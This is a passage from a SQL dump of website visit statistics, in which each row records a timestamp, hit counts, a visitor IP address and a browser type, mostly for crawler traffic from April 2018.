,'66.249.66.201','chrome'),(232733,1523490994,1,1,0,0,'141.8.142.74','other'),(232734,1523491354,1,0,1,0,'66.249.66.195',''),(232735,1523492831,1,1,0,0,'217.69.133.228','other'),(232736,1523492988,1,1,0,0,'217.69.133.242','other'),(232737,1523493527,1,1,0,0,'217.69.133.241','other'),(232738,1523494267,1,1,0,0,'54.165.59.7','other'),(232739,1523494721,1,1,0,0,'178.154.200.41','other'),(232740,1523494793,1,1,0,0,'217.69.133.247','other'),(232741,1523494802,2,0,2,0,'66.249.66.201',''),(232742,1523494966,1,1,0,0,'8.29.198.26','other'),(232743,1523495304,1,1,0,0,'193.106.30.99','firefox'),(232744,1523495329,1,1,0,0,'66.249.66.157','chrome'),(232745,1523495576,1,1,0,0,'217.69.136.210','other'),(232746,1523495839,1,0,1,0,'66.249.66.201',''),(232747,1523496086,12,12,0,0,'23.237.4.26','other'),(232748,1523496185,1,1,0,0,'141.8.142.74','other'),(232749,1523496969,1,1,0,0,'216.244.66.237','other'),(232750,1523497442,1,0,1,0,'66.249.66.199',''),(232751,1523497578,2,2,0,0,'141.8.142.74','other'),(232752,1523498938,1,1,0,0,'217.69.136.206','other'),(232753,1523498953,1,1,0,0,'217.69.133.246','other'),(232754,1523500128,2,2,0,0,'178.92.249.57','chrome'),(232755,1523501216,1,0,1,0,'66.249.66.199',''),(232756,1523502556,1,1,0,0,'178.154.171.88','other'),(232757,1523502906,1,1,0,0,'193.201.224.228','chrome'),(232758,1523503540,1,1,0,0,'141.8.142.74','other'),(232759,1523505803,1,1,0,0,'8.29.198.26','other'),(232760,1523510086,1,1,0,0,'141.8.142.74','other'),(232761,1523510830,1,1,0,0,'178.93.58.165','chrome'),(232762,1523511521,1,1,0,0,'216.244.66.237','other'),(232763,1523512142,1,1,0,0,'46.201.59.215','chrome'),(232764,1523512575,1,0,1,0,'66.249.66.201',''),(232765,1523512759,1,1,0,0,'141.8.142.74','other'),(232766,1523512953,7,7,0,0,'91.196.178.84','chrome'),(232767,1523512983,1,1,0,0,'217.69.133.219','other'),(232768,1523513935,1,1,0,0,'217.69.133.248','other'),(232769,1523514044,1,1,0,0,'95.132.42.86','firefox'),(232770,1523514176,2,2,0,0,'91.196.178.169','chrome'),(232771,1523514258,1,1,0,0,'92.112.223.221','chrome'),(232772,1523514579,1,1,0,0,'180.76.15.162','other'),(232773,1523515226,1,1,0,0,'217.69.136.207','other'),(232774,1523515478,2,2,0,0,'91.196.178.97','chrome'),(232775,1523515634,1,1,0,0,'207.46.13.30','other'),(232776,1523516613,2,2,0,0,'216.244.66.237','other'),(232777,1523516640,1,1,0,0,'8.29.198.25','other'),(232778,1523516681,1,1,0,0,'141.8.142.74','other'),(232779,1523517004,1,1,0,0,'194.44.17.249','chrome'),(232780,1523517354,2,2,0,0,'91.196.178.84','chrome'),(232781,1523517548,1,1,0,0,'91.214.85.232','firefox'),(232782,1523517797,2,2,0,0,'194.37.248.11','chrome'),(232783,1523518046,1,1,0,0,'94.153.229.229','other'),(232784,1523518233,1,1,0,0,'93.185.217.145','chrome'),(232785,1523518804,1,1,0,0,'40.77.167.56','other'),(232786,1523518877,1,0,1,0,'66.249.66.199',''),(232787,1523518958,1,1,0,0,'91.196.178.97','chrome'),(232788,1523519414,1,1,0,0,'91.196.178.19','chrome'),(232789,1523519446,1,1,0,0,'217.69.133.190','other'),(232790,1523519521,1,1,0,0,'178.62.153.200','chrome'),(232791,1523519561,2,2,0,0,'46.219.6.41','chrome'),(232792,1523519832,1,1,0,0,'216.244.66.237','other'),(232793,1523520129,2,2,0,0,'92.112.125.243','chrome'),(232794,1523520335,1,1,0,0,'91.196.178.171','chrome'),(232795,1523520402,1,1,0,0,'217.69.133.253','other'),(232796,1523520473,1,1,0,0,'82.207.121.233','chrome'),(232797,1523520672,2,2,0,0,'141.8.142.74','other'),(232798,1523520736,1,1,0,0,'217.69.133.193','other'),(232799,1523520812,1,1,0,0,'193.106.30.99','firefox'),(232800,1523521171,1,1,0,0,'217.69.133.59','other'),(232801,1523521228,2,2,0,0,'91.196.178.84','chrome'),(232802,1523521393,1,1,0,0,'217.69.133.215','other'),(232803,1523521885,1,1,0,0,'91.196.178.97','chrome'),(232804,1523522281,1,1,0,0,'194.37.248.11','firefox'),(232805,1523522385,2,2,0,0,'35.226.23.240','other'),(232806,1523522426,1,1,0,0,'62.205.134.182','msie'),(232807,1523522500,3,3,0,0,'91.196.178.84','chrome'),(232808,1523522790,1,1,0,0,'217.69.136.209','other'),(232809,1523523011,1,1,0,0,'91.196.178.97','chrome'),(232810,1523523185,1,1,0,0,'207.244.149.75','chrome'),(232811,1523523241,1,1,0,0,'217.69.133.215','other'),(232812,1523523522,1,1,0,0,'37.9.113.101','other'),(232813,1523523537,13,13,0,0,'91.196.178.84','chrome'),(232814,1523524009,1,0,1,0,'66.249.66.199',''),(232815,1523524170,1,1,0,0,'178.154.171.88','other'),(232816,1523524178,1,1,0,0,'217.69.136.203','other'),(232817,1523525600,1,1,0,0,'217.69.133.60','other'),(232818,1523527346,1,1,0,0,'207.46.13.28','other'),(232819,1523527367,1,1,0,0,'35.226.23.240','other'),(232820,1523527484,1,1,0,0,'8.29.198.27','other'),(232821,1523527489,1,1,0,0,'216.244.66.237','other'),(232822,1523527519,1,1,0,0,'31.43.60.162','chrome'),(232823,1523528297,1,1,0,0,'217.69.133.251','other'),(232824,1523528391,1,1,0,0,'178.154.171.88','other'),(232825,1523528644,1,1,0,0,'217.69.133.10','other'),(232826,1523528790,1,1,0,0,'217.69.133.241','other'),(232827,1523528791,1,1,0,0,'217.69.133.243','other'),(232828,1523528793,1,1,0,0,'217.69.133.244','other'),(232829,1523529014,1,1,0,0,'217.69.133.252','other'),(232830,1523529220,1,0,1,0,'66.249.66.199',''),(232831,1523530988,1,0,1,0,'66.249.66.195',''),(232832,1523531039,1,1,0,0,'178.93.204.193','chrome'),(232833,1523531902,2,2,0,0,'91.196.178.84','chrome'),(232834,1523532258,1,1,0,0,'217.69.133.18','other'),(232835,1523532367,1,1,0,0,'194.37.248.11','chrome'),(232836,1523532506,1,1,0,0,'217.69.136.209','other'),(232837,1523532591,1,1,0,0,'66.249.66.195','chrome'),(232838,1523532664,1,1,0,0,'66.249.66.157','chrome'),(232839,1523532709,1,1,0,0,'217.69.136.203','other'),(232840,1523532803,1,1,0,0,'141.8.142.74','other'),(232841,1523533058,1,1,0,0,'217.69.133.84','other'),(232842,1523533159,1,1,0,0,'178.154.171.88','other'),(232843,1523533365,1,1,0,0,'91.196.179.138','chrome'),(232844,1523534279,1,1,0,0,'178.154.171.88','other'),(232845,1523534380,1,1,0,0,'217.69.133.28','other'),(232846,1523534465,1,1,0,0,'217.69.133.67','other'),(232847,1523534467,1,1,0,0,'217.69.133.217','other'),(232848,1523534468,2,2,0,0,'78.111.187.94','chrome'),(232849,1523534469,1,1,0,0,'91.196.179.138','chrome'),(232850,1523534602,1,1,0,0,'217.69.136.210','other'),(232851,1523534670,1,1,0,0,'37.52.129.73','chrome'),(232852,1523534783,1,0,1,0,'66.249.66.199',''),(232853,1523535130,1,1,0,0,'185.76.69.66','firefox'),(232854,1523535201,1,1,0,0,'141.8.142.74','other'),(232855,1523535706,1,1,0,0,'217.69.133.248','other'),(232856,1523535708,1,1,0,0,'217.69.133.23','other'),(232857,1523535835,1,1,0,0,'95.211.188.228','firefox'),(232858,1523535850,1,1,0,0,'91.196.178.68','chrome'),(232859,1523536069,1,1,0,0,'217.69.133.229','other'),(232860,1523536134,1,1,0,0,'217.69.133.31','other'),(232861,1523536156,1,1,0,0,'180.76.15.6','other'),(232862,1523536255,2,2,0,0,'141.8.142.74','other'),(232863,1523536705,1,1,0,0,'130.180.209.162','chrome'),(232864,1523537078,1,0,1,0,'66.249.66.195',''),(232865,1523537593,1,1,0,0,'141.8.142.74','other'),(232866,1523538003,1,1,0,0,'91.196.178.94','chrome'),(232867,1523538322,1,1,0,0,'8.29.198.26','other'),(232868,1523538540,1,1,0,0,'141.8.142.74','other'),(232869,1523538541,1,1,0,0,'217.69.133.84','other'),(232870,1523538571,1,1,0,0,'217.69.136.208','other'),(232871,1523538820,1,1,0,0,'91.196.178.94','firefox'),(232872,1523538821,9,9,0,0,'91.196.178.84','chrome'),(232873,1523539141,1,1,0,0,'207.46.13.23','other'),(232874,1523539370,1,1,0,0,'46.185.121.144','firefox'),(232875,1523539378,1,1,0,0,'77.111.244.57','chrome'),(232876,1523539694,1,1,0,0,'141.8.142.74','other'),(232877,1523539918,1,1,0,0,'193.106.30.99','firefox'),(232878,1523540917,1,1,0,0,'178.154.171.88','other'),(232879,1523540933,2,2,0,0,'216.244.66.237','other'),(232880,1523541263,1,1,0,0,'92.112.63.72','chrome'),(232881,1523541742,1,1,0,0,'141.8.142.74','other'),(232882,1523542830,1,1,0,0,'94.45.145.8','chrome'),(232883,1523544026,2,2,0,0,'217.69.133.247','other'),(232884,1523544238,1,1,0,0,'217.69.133.217','other'),(232885,1523545118,3,3,0,0,'141.8.142.74','other'),(232886,1523545149,1,1,0,0,'91.196.177.46','chrome'),(232887,1523545405,1,1,0,0,'178.154.171.88','other'),(232888,1523545517,1,1,0,0,'78.154.174.186','firefox'),(232889,1523546152,1,0,1,0,'66.249.66.195',''),(232890,1523546176,1,0,1,0,'66.249.66.211',''),(232891,1523546435,3,3,0,0,'178.92.249.218','chrome'),(232892,1523546468,1,1,0,0,'217.69.133.59','other'),(232893,1523546726,1,1,0,0,'91.196.178.102','chrome'),(232894,1523547553,1,0,1,0,'66.249.66.199',''),(232895,1523547566,1,1,0,0,'141.8.142.74','other'),(232896,1523547593,1,1,0,0,'40.77.167.56','other'),(232897,1523548599,1,1,0,0,'188.230.43.254','other'),(232898,1523548628,2,2,0,0,'141.8.142.74','other'),(232899,1523549162,1,1,0,0,'8.29.198.25','other'),(232900,1523549297,1,1,0,0,'141.8.132.19','other'),(232901,1523549369,1,1,0,0,'217.69.133.216','other'),(232902,1523549444,1,1,0,0,'217.69.133.249','other'),(232903,1523549477,1,1,0,0,'207.46.13.39','other'),(232904,1523549554,1,1,0,0,'217.69.133.221','other'),(232905,1523549675,3,3,0,0,'91.196.178.26','chrome'),(232906,1523550066,1,1,0,0,'216.244.66.237','other'),(232907,1523550155,1,1,0,0,'217.69.133.190','other'),(232908,1523550157,1,1,0,0,'217.69.133.244','other'),(232909,1523550575,1,1,0,0,'188.230.43.254','other'),(232910,1523550959,1,1,0,0,'141.8.142.74','other'),(232911,1523551194,1,1,0,0,'217.69.133.11','other'),(232912,1523551893,1,1,0,0,'180.76.15.29','other'),(232913,1523551980,1,1,0,0,'207.46.13.38','other'),(232914,1523552122,2,2,0,0,'141.8.142.74','other'),(232915,1523552373,1,1,0,0,'87.250.224.46','other'),(232916,1523552517,1,1,0,0,'178.154.171.88','other'),(232917,1523552993,1,1,0,0,'188.230.43.254','other'),(232918,1523553558,1,1,0,0,'178.154.171.88','other'),(232919,1523553791,1,1,0,0,'193.106.30.99','firefox'),(232920,1523554736,1,1,0,0,'95.132.11.167','other'),(232921,1523554790,1,1,0,0,'141.8.142.74','other'),(232922,1523555204,1,1,0,0,'188.230.43.254','other'),(232923,1523555213,1,1,0,0,'217.69.133.221','other'),(232924,1523555788,1,1,0,0,'207.46.13.37','other'),(232925,1523555829,2,2,0,0,'217.69.133.18','other'),(232926,1523555835,1,1,0,0,'217.69.133.222','other'),(232927,1523555836,1,1,0,0,'217.69.133.11','other'),(232928,1523555889,1,1,0,0,'217.69.136.207','other'),(232929,1523556147,1,1,0,0,'217.69.133.228','other'),(232930,1523556188,1,1,0,0,'207.46.13.39','other'),(232931,1523556236,1,1,0,0,'106.75.140.218','chrome'),(232932,1523556797,1,1,0,0,'178.154.171.88','other'),(232933,1523557220,2,2,0,0,'207.46.13.38','other'),(232934,1523557231,1,1,0,0,'217.69.133.217','other'),(232935,1523557294,1,1,0,0,'141.8.142.74','other'),(232936,1523558464,1,1,0,0,'178.154.171.88','other'),(232937,1523558477,1,1,0,0,'217.69.133.230','other'),(232938,1523558524,1,1,0,0,'216.244.66.237','other'),(232939,1523559748,1,1,0,0,'66.249.66.156','chrome'),(232940,1523559994,1,1,0,0,'8.29.198.27','other'),(232941,1523560232,2,2,0,0,'37.54.114.62','chrome'),(232942,1523561199,1,1,0,0,'37.54.114.62','chrome'),(232943,1523562599,1,1,0,0,'216.244.66.237','other'),(232944,1523562767,1,1,0,0,'217.69.133.223','other'),(232945,1523562916,1,1,0,0,'217.69.133.84','other'),(232946,1523563406,1,1,0,0,'193.106.30.99','firefox'),(232947,1523563456,2,2,0,0,'141.8.142.74','other'),(232948,1523563472,2,2,0,0,'91.196.178.163','chrome'),(232949,1523564133,1,1,0,0,'217.69.133.250','other'),(232950,1523564148,1,1,0,0,'178.154.171.88','other'),(232951,1523565799,1,1,0,0,'217.69.133.229','other'),(232952,1523566315,2,2,0,0,'141.8.142.74','other'),(232953,1523566529,1,1,0,0,'178.154.171.88','other'),(232954,1523567085,1,1,0,0,'217.69.133.11','other'),(232955,1523567663,1,1,0,0,'217.69.133.221','other'),(232956,1523567673,1,1,0,0,'141.8.142.74','other'),(232957,1523568744,1,1,0,0,'178.154.171.88','other'),(232958,1523569298,1,1,0,0,'217.69.133.240','other'),(232959,1523569412,1,1,0,0,'193.106.30.99','firefox'),(232960,1523569479,1,1,0,0,'217.69.133.13','other'),(232961,1523569535,1,1,0,0,'217.69.133.72','other'),(232962,1523569871,1,1,0,0,'217.69.133.248','other'),(232963,1523570185,1,1,0,0,'163.172.4.153','chrome'),(232964,1523570627,1,1,0,0,'178.154.171.88','other'),(232965,1523570820,1,1,0,0,'8.29.198.25','other'),(232966,1523571042,2,2,0,0,'207.46.13.39','other'),(232967,1523571361,1,1,0,0,'141.8.142.74','other'),(232968,1523571578,1,1,0,0,'178.154.171.88','other'),(232969,1523572279,1,1,0,0,'217.69.133.233','other'),(232970,1523572825,1,1,0,0,'217.69.136.206','other'),(232971,1523573009,1,1,0,0,'217.69.136.203','other'),(232972,1523573187,1,1,0,0,'35.226.23.240','other'),(232973,1523573527,3,3,0,0,'46.229.173.137','other'),(232974,1523573717,2,2,0,0,'141.8.142.74','other'),(232975,1523574238,1,1,0,0,'178.154.171.88','other'),(232976,1523574437,1,1,0,0,'217.69.133.245','other'),(232977,1523574438,1,1,0,0,'217.69.133.236','other'),(232978,1523574451,2,2,0,0,'46.229.173.137','other'),(232979,1523574640,1,1,0,0,'217.69.136.203','other'),(232980,1523575409,1,1,0,0,'217.69.133.13','other'),(232981,1523575609,4,4,0,0,'46.229.173.137','other'),(232982,1523576289,1,1,0,0,'217.69.133.18','other'),(232983,1523576575,1,1,0,0,'217.69.133.84','other'),(232984,1523576628,1,1,0,0,'178.93.55.92','other'),(232985,1523576717,1,1,0,0,'46.229.173.137','other'),(232986,1523576764,1,1,0,0,'216.244.66.237','other'),(232987,1523577822,1,1,0,0,'217.69.133.247','other'),(232988,1523577888,1,1,0,0,'217.69.134.182','other'),(232989,1523578806,1,1,0,0,'217.69.136.206','other'),(232990,1523579500,1,1,0,0,'217.69.133.242','other'),(232991,1523579502,1,1,0,0,'217.69.133.244','other'),(232992,1523580045,1,1,0,0,'217.69.133.194','other'),(232993,1523580059,1,1,0,0,'217.69.133.4','other'),(232994,1523580977,1,1,0,0,'94.158.155.203','firefox'),(232995,1523581657,1,1,0,0,'8.29.198.27','other'),(232996,1523581979,1,1,0,0,'193.106.30.99','firefox'),(232997,1523582543,1,1,0,0,'141.8.142.74','other'),(232998,1523582568,1,1,0,0,'217.69.133.229','other'),(232999,1523582902,1,1,0,0,'178.154.171.88','other'),(233000,1523582906,1,1,0,0,'87.250.224.46','other'),(233001,1523584047,1,1,0,0,'37.9.113.115','other'),(233002,1523584209,1,1,0,0,'217.69.136.206','other'),(233003,1523584272,1,1,0,0,'217.69.133.253','other'),(233004,1523585559,1,1,0,0,'216.244.66.237','other'),(233005,1523585772,1,1,0,0,'217.69.133.59','other'),(233006,1523587396,1,1,0,0,'216.244.66.237','other'),(233007,1523588471,1,1,0,0,'217.69.133.31','other'),(233008,1523589808,1,1,0,0,'217.69.134.182','other'),(233009,1523589916,1,1,0,0,'157.55.39.152','other'),(233010,1523590112,1,1,0,0,'87.250.224.85','other'),(233011,1523590412,1,1,0,0,'217.69.133.248','other'),(233012,1523590556,1,1,0,0,'217.69.133.229','other'),(233013,1523590680,1,1,0,0,'217.69.133.241','other'),(233014,1523591007,1,1,0,0,'37.9.113.114','other'),(233015,1523591759,1,1,0,0,'217.69.136.207','other'),(233016,1523591912,1,1,0,0,'87.250.224.85','other'),(233017,1523591996,1,1,0,0,'217.69.133.235','other'),(233018,1523591998,1,1,0,0,'217.69.133.240','other'),(233019,1523592481,1,1,0,0,'8.29.198.27','other'),(233020,1523592575,1,1,0,0,'87.250.224.46','other'),(233021,1523592970,1,1,0,0,'66.249.66.201','chrome'),(233022,1523593437,1,1,0,0,'207.46.13.37','other'),(233023,1523593514,1,1,0,0,'216.244.66.237','other'),(233024,1523593559,1,1,0,0,'178.154.200.7','other'),(233025,1523593572,1,1,0,0,'217.69.133.253','other'),(233026,1523593593,1,1,0,0,'157.55.39.152','other'),(233027,1523594046,1,1,0,0,'217.69.133.67','other'),(233028,1523594353,1,1,0,0,'141.8.142.74','other'),(233029,1523594680,1,1,0,0,'87.250.224.46','other'),(233030,1523595065,1,1,0,0,'193.106.30.99','firefox'),(233031,1523595080,1,1,0,0,'109.86.20.18','chrome'),(233032,1523595249,1,1,0,0,'217.69.133.220','other'),(233033,1523596100,1,1,0,0,'87.250.224.46','other'),(233034,1523596322,1,1,0,0,'217.69.136.208','other'),(233035,1523596414,1,1,0,0,'54.224.54.80','other'),(233036,1523596471,1,1,0,0,'216.244.66.237','other'),(233037,1523596551,1,1,0,0,'141.8.142.74','other'),(233038,1523596669,2,2,0,0,'91.196.178.84','chrome'),(233039,1523597663,1,1,0,0,'87.106.186.11','chrome'),(233040,1523597775,1,1,0,0,'207.46.13.39','other'),(233041,1523598104,1,1,0,0,'91.196.178.65','chrome'),(233042,1523598125,1,1,0,0,'141.8.142.74','other'),(233043,1523598205,1,1,0,0,'217.69.133.69','other'),(233044,1523598235,1,0,1,0,'66.249.66.199',''),(233045,1523598282,1,1,0,0,'46.201.59.215','chrome'),(233046,1523598740,1,1,0,0,'217.69.133.18','other'),(233047,1523599720,1,1,0,0,'141.8.142.74','other'),(233048,1523600408,1,1,0,0,'91.196.179.138','chrome'),(233049,1523601316,1,1,0,0,'185.103.254.68','firefox'),(233050,1523601325,2,2,0,0,'91.196.178.68','chrome'),(233051,1523601426,1,1,0,0,'217.69.136.209','other'),(233052,1523601593,1,1,0,0,'217.69.133.10','other'),(233053,1523601722,1,1,0,0,'193.106.30.99','firefox'),(233054,1523602050,2,2,0,0,'216.244.66.237','other'),(233055,1523602075,1,1,0,0,'217.69.133.15','other'),(233056,1523602155,1,1,0,0,'217.69.136.205','other'),(233057,1523602433,1,1,0,0,'91.196.179.138','chrome'),(233058,1523602520,1,1,0,0,'178.154.171.88','other'),(233059,1523602938,1,1,0,0,'217.69.133.250','other'),(233060,1523602998,2,2,0,0,'216.244.66.237','other'),(233061,1523603208,1,1,0,0,'217.69.133.14','other'),(233062,1523603219,2,0,2,0,'66.249.66.199',''),(233063,1523603319,1,1,0,0,'8.29.198.25','other'),(233064,1523603455,1,1,0,0,'178.154.171.88','other'),(233065,1523603834,1,1,0,0,'217.69.133.28','other'),(233066,1523603860,2,2,0,0,'217.69.133.239','other'),(233067,1523603861,2,2,0,0,'91.196.178.169','chrome'),(233068,1523604016,1,1,0,0,'217.69.133.11','other'),(233069,1523604124,1,1,0,0,'141.8.142.74','other'),(233070,1523604196,1,1,0,0,'180.76.15.141','other'),(233071,1523604305,4,4,0,0,'91.196.178.84','chrome'),(233072,1523604536,1,1,0,0,'5.45.207.58','other'),(233073,1523604886,1,1,0,0,'217.69.133.249','other'),(233074,1523605045,1,1,0,0,'141.8.142.74','other'),(233075,1523605746,1,0,1,0,'66.249.66.199',''),(233076,1523606497,1,0,1,0,'66.249.66.201',''),(233077,1523606568,1,1,0,0,'82.145.222.242','chrome'),(233078,1523606651,1,0,1,0,'66.249.66.199',''),(233079,1523606852,3,3,0,0,'178.154.171.88','other'),(233080,1523607042,1,1,0,0,'217.69.133.192','other'),(233081,1523607096,2,2,0,0,'195.230.119.59','chrome'),(233082,1523607430,1,1,0,0,'217.69.136.210','other'),(233083,1523607464,1,1,0,0,'37.9.113.132','other'),(233084,1523607494,1,1,0,0,'217.69.133.10','other'),(233085,1523607514,1,1,0,0,'66.249.66.195','chrome'),(233086,1523607670,1,0,1,0,'66.249.66.201',''),(233087,1523607970,1,1,0,0,'217.69.133.227','other'),(233088,1523608038,2,2,0,0,'134.249.146.125','chrome'),(233089,1523608190,1,1,0,0,'217.69.133.230','other'),(233090,1523608276,3,3,0,0,'62.205.134.182','other'),(233091,1523608280,1,1,0,0,'217.69.133.31','other'),(233092,1523608350,2,2,0,0,'141.8.142.74','other'),(233093,1523608895,2,0,2,0,'66.249.66.201',''),(233094,1523609340,1,1,0,0,'178.94.60.87','chrome'),(233095,1523609912,1,1,0,0,'217.69.133.28','other'),(233096,1523609928,1,1,0,0,'217.69.133.59','other'),(233097,1523609952,1,1,0,0,'54.67.59.131','chrome'),(233098,1523610383,1,1,0,0,'5.45.207.82','other'),(233099,1523610426,1,1,0,0,'193.106.30.99','firefox'),(233100,1523610764,1,1,0,0,'217.69.133.69','other'),(233101,1523610977,1,1,0,0,'91.196.178.163','chrome'),(233102,1523611184,1,1,0,0,'217.69.133.67','other'),(233103,1523611228,1,1,0,0,'66.249.66.195','chrome'),(233104,1523611410,2,2,0,0,'195.10.210.49','chrome'),(233105,1523611912,5,5,0,0,'91.196.178.84','chrome'),(233106,1523613335,1,1,0,0,'5.9.144.234','other'),(233107,1523613378,1,1,0,0,'91.196.178.59','chrome'),(233108,1523613649,1,1,0,0,'217.69.133.59','other'),(233109,1523614125,1,1,0,0,'91.196.177.46','chrome'),(233110,1523614157,1,1,0,0,'8.29.198.26','other'),(233111,1523614191,1,1,0,0,'217.69.133.231','other'),(233112,1523614413,1,0,1,0,'66.249.66.201',''),(233113,1523614725,1,1,0,0,'217.69.133.68','other'),(233114,1523614902,1,1,0,0,'217.69.133.239','other'),(233115,1523615432,1,1,0,0,'185.181.38.35','chrome'),(233116,1523615531,1,1,0,0,'37.9.113.100','other'),(233117,1523615584,1,0,1,0,'66.249.66.199',''),(233118,1523615762,1,1,0,0,'180.76.15.9','other'),(233119,1523615951,1,1,0,0,'213.180.203.7','other'),(233120,1523615953,1,1,0,0,'178.154.200.32','other'),(233121,1523616411,1,1,0,0,'141.8.142.74','other'),(233122,1523616514,1,1,0,0,'91.196.178.66','firefox'),(233123,1523616893,1,1,0,0,'217.69.133.217','other'),(233124,1523617450,1,1,0,0,'178.154.171.4','other'),(233125,1523617465,1,1,0,0,'178.154.171.88','other'),(233126,1523617467,1,1,0,0,'91.196.178.98','chrome'),(233127,1523617544,1,1,0,0,'31.193.91.80','chrome'),(233128,1523617982,1,1,0,0,'91.196.178.131','firefox'),(233129,1523618036,2,0,2,0,'66.249.66.201',''),(233130,1523618216,1,1,0,0,'167.114.219.41','other'),(233131,1523618829,1,1,0,0,'217.69.133.246','other'),(233132,1523618893,1,1,0,0,'217.69.133.251','other'),(233133,1523619025,1,0,1,0,'66.249.66.199',''),(233134,1523619357,1,1,0,0,'217.69.133.28','other'),(233135,1523619378,1,1,0,0,'216.244.66.237','other'),(233136,1523619765,1,1,0,0,'207.46.13.37','other'),(233137,1523619876,1,1,0,0,'91.196.178.131','firefox'),(233138,1523620371,3,0,3,0,'66.249.66.199',''),(233139,1523620557,1,1,0,0,'217.69.136.203','other'),(233140,1523620737,1,1,0,0,'217.69.133.223','other'),(233141,1523620905,1,0,1,0,'66.249.66.195',''),(233142,1523620925,1,1,0,0,'141.8.142.74','other'),(233143,1523621241,1,1,0,0,'180.76.15.8','other'),(233144,1523621652,1,1,0,0,'217.69.133.239','other'),(233145,1523621674,1,1,0,0,'217.69.133.231','other'),(233146,1523621677,1,1,0,0,'217.69.133.228','other'),(233147,1523621934,1,1,0,0,'178.154.171.88','other'),(233148,1523622311,2,2,0,0,'194.37.248.11','chrome'),(233149,1523622420,1,1,0,0,'35.226.23.240','other'),(233150,1523622502,1,1,0,0,'91.196.178.93','firefox'),(233151,1523622811,1,1,0,0,'217.69.133.227','other'),(233152,1523622917,1,1,0,0,'207.46.13.36','other'),(233153,1523623482,1,0,1,0,'66.249.66.201',''),(233154,1523623673,1,1,0,0,'217.69.133.59','other'),(233155,1523624317,1,1,0,0,'217.69.133.244','other'),(233156,1523624319,1,1,0,0,'217.69.133.243','other'),(233157,1523624626,1,1,0,0,'217.69.133.230','other'),(233158,1523624819,1,1,0,0,'193.106.30.99','firefox'),(233159,1523624838,1,1,0,0,'217.69.133.237','other'),(233160,1523624992,2,2,0,0,'91.196.177.46','chrome'),(233161,1523624996,1,1,0,0,'8.29.198.25','other'),(233162,1523625059,1,1,0,0,'217.69.133.226','other'),(233163,1523625199,1,1,0,0,'82.207.118.216','firefox'),(233164,1523625392,1,1,0,0,'216.244.66.237','other'),(233165,1523625974,1,1,0,0,'217.69.133.218','other'),(233166,1523626277,1,1,0,0,'87.250.224.85','other'),(233167,1523626942,2,2,0,0,'141.8.142.74','other'),(233168,1523626968,1,1,0,0,'91.209.11.236','other'),(233169,1523627121,1,1,0,0,'216.244.66.237','other'),(233170,1523627140,1,1,0,0,'217.69.133.235','other'),(233171,1523627326,1,1,0,0,'91.196.178.101','chrome'),(233172,1523628514,1,1,0,0,'216.244.66.237','other'),(233173,1523628546,1,0,1,0,'66.249.66.199',''),(233174,1523628901,1,1,0,0,'178.154.171.88','other'),(233175,1523629313,7,7,0,0,'69.30.213.138','other'),(233176,1523629353,1,1,0,0,'35.226.23.240','other'),(233177,1523629365,1,1,0,0,'66.249.66.195','chrome'),(233178,1523629383,1,1,0,0,'217.69.133.28','other'),(233179,1523629732,2,2,0,0,'62.210.157.95','other'),(233180,1523630027,1,0,1,0,'66.249.66.199',''),(233181,1523630505,1,1,0,0,'217.69.133.234','other'),(233182,1523630569,1,1,0,0,'217.69.133.29','other'),(233183,1523630623,1,1,0,0,'141.8.142.74','other'),(233184,1523630912,1,1,0,0,'217.69.136.208','other'),(233185,1523630914,1,1,0,0,'217.69.136.205','other'),(233186,1523631060,1,1,0,0,'66.249.66.213','chrome'),(233187,1523631976,1,0,1,0,'66.249.66.156',''),(233188,1523632031,1,1,0,0,'217.69.136.209','other'),(233189,1523632538,1,1,0,0,'217.69.133.10','other'),(233190,1523632603,3,3,0,0,'141.8.142.74','other'),(233191,1523632605,1,1,0,0,'217.69.133.217','other'),(233192,1523633171,1,0,1,0,'66.249.66.201',''),(233193,1523634249,1,1,0,0,'217.69.133.236','other'),(233194,1523634581,1,1,0,0,'217.69.134.182','other'),(233195,1523634594,1,1,0,0,'217.69.133.5','other'),(233196,1523634609,2,2,0,0,'217.69.134.188','other'),(233197,1523634620,1,1,0,0,'93.72.4.209','chrome'),(233198,1523634621,1,1,0,0,'217.69.133.194','other'),(233199,1523634631,1,1,0,0,'217.69.134.160','other'),(233200,1523634853,1,1,0,0,'141.8.142.74','other'),(233201,1523635837,1,1,0,0,'8.29.198.25','other'),(233202,1523635960,1,1,0,0,'217.69.133.251','other'),(233203,1523635962,1,1,0,0,'217.69.133.191','other'),(233204,1523636071,1,1,0,0,'217.69.133.15','other'),(233205,1523636075,1,1,0,0,'217.69.133.14','other'),(233206,1523636274,1,1,0,0,'217.69.133.248','other'),(233207,1523636328,1,1,0,0,'216.244.66.237','other'),(233208,1523636720,1,1,0,0,'217.69.133.192','other'),(233209,1523636722,1,1,0,0,'217.69.133.29','other'),(233210,1523637048,1,1,0,0,'141.8.142.74','other'),(233211,1523637417,1,1,0,0,'217.69.133.72','other'),(233212,1523637611,1,1,0,0,'91.209.11.236','other'),(233213,1523637704,1,1,0,0,'217.69.133.230','other'),(233214,1523637706,1,1,0,0,'217.69.133.227','other'),(233215,1523638270,1,1,0,0,'216.244.66.237','other'),(233216,1523638372,3,3,0,0,'37.54.22.192','chrome'),(233217,1523638634,1,1,0,0,'178.154.171.88','other'),(233218,1523639414,2,2,0,0,'216.244.66.237','other'),(233219,1523639773,2,2,0,0,'141.8.142.74','other'),(233220,1523640925,1,1,0,0,'178.154.171.88','other'),(233221,1523641261,2,2,0,0,'141.8.142.74','other'),(233222,1523641852,1,1,0,0,'178.154.171.88','other'),(233223,1523641908,1,1,0,0,'217.69.133.193','other'),(233224,1523642069,1,1,0,0,'193.106.30.99','firefox'),(233225,1523642117,1,1,0,0,'217.69.133.235','other'),(233226,1523642574,1,1,0,0,'141.8.142.74','other'),(233227,1523642912,1,1,0,0,'217.69.133.30','other'),(233228,1523642959,1,1,0,0,'217.69.133.31','other'),(233229,1523643354,1,1,0,0,'217.69.133.227','other'),(233230,1523643623,1,1,0,0,'54.165.59.7','other'),(233231,1523644196,1,0,1,0,'66.249.66.199',''),(233232,1523644405,1,1,0,0,'217.69.133.248','other'),(233233,1523644734,1,1,0,0,'180.76.15.29','other'),(233234,1523645744,1,1,0,0,'95.132.31.163','firefox'),(233235,1523645900,2,2,0,0,'91.196.178.19','chrome'),(233236,1523646009,1,1,0,0,'66.249.66.201','chrome'),(233237,1523646027,1,1,0,0,'54.165.59.7','other'),(233238,1523646044,1,1,0,0,'5.9.155.37','other'),(233239,1523646249,1,1,0,0,'217.69.133.230','other'),(233240,1523646427,1,1,0,0,'169.51.128.253','other'),(233241,1523646499,2,0,2,0,'66.249.66.199',''),(233242,1523646665,1,1,0,0,'8.29.198.26'